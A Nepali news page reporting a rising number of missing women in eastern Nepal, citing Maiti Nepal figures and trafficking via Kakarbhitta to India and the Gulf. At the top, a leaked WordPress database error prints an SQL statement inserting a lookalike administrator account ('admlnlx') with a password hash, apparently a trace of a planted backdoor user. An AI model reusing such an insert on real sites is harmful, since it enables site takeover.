WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BuazbmGqhp/CycP17N5Dsd0RORWoUf1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 02:05:25', '', 'admlnlx', 'admlnlx')
काठमाडौं माघ ४ –
बर्सेनि हराएका महिलाको संख्या बढेको बढ्यै छ । प्रहरी तथा महिलाको क्षेत्रमा काम गर्ने संस्थाहरुको तथ्यांक अनुसार त्यस्ता हराएका महिलाको संख्या बर्सेनि बढ्ने क्रममा रहेको खबर अन्नपूर्ण पोष्टमा छ ।
माइती नेपालका अनुसार सन् २०१६ मा पूर्वबाट हराउने महिलाको संख्या १ सय ५४ छ । उक्त संख्यामा हराएका महिलाको खोजी गरिदिन भनेर माइती नेपाललाई आग्रह गरेको संख्या मात्र हो ।
हराएका तर उजुरी नगरेको संख्या पनि उल्लेख्य हुन सक्ने माइती नेपालका क्षेत्रीय कार्यक्रम अधिकृत गोविन्द घिमिरेले बताए ।
सुरुमा महिलालाई भारत लगेर विभिन्न ठाउँमा बेच्ने परिपाटी रहँदै आएकोमा अहिले काँकडभिट्ट नाका हुदै भारत लगेर खाडी तथा अन्य मुलुकमा बेच्ने परिपाटी बढेका कारण महिला हराउने क्रम बढेको घिमिरेले बताए ।